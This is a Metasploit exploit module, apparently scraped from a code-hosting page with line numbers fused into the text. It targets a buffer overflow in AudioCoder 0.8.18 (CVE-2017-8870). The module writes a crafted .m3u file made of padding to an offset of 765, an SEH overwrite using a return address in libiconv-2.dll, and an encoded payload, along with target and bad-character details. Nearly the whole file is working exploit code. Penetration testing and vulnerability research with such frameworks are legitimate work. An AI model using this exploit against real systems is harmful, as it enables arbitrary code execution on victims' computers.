Path: blob/master/modules/exploits/windows/fileformat/audio_coder_m3u.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'AudioCoder .M3U Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability18occurs when adding an .m3u, allowing arbitrary code execution with the privileges19of the user running AudioCoder. This module has been tested successfully on20AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.21},22'License' => MSF_LICENSE,23'Author' => [24'metacom', # Vulnerability discovery and PoC25'juan vazquez' # Metasploit module26],27'References' => [28[ 'CVE', '2017-8870' ],29[ 'OSVDB', '92939' ],30[ 'EDB', '25141' ]31],32'DefaultOptions' => {33'EXITFUNC' => 'process'34},35'Platform' => 'win',36'Payload' => {37'Space' => 6596,38'BadChars' => "\x00\x5c\x40\x0d\x0a",39'DisableNops' => true,40'StackAdjustment' => -3500,41},42'Targets' => [43[44'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',45{46'Ret' => 0x66011b56, # ppr from libiconv-2.dll47'Offset' => 76548}49]50],51'Privileged' => false,52'DisclosureDate' => '2013-05-01',53'DefaultTarget' => 0,54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),65]66)67end6869def exploit70buffer = "http://"71buffer << rand_text(target['Offset'])72buffer << generate_seh_record(target.ret)73buffer << payload.encoded7475file_create(buffer)76end77end787980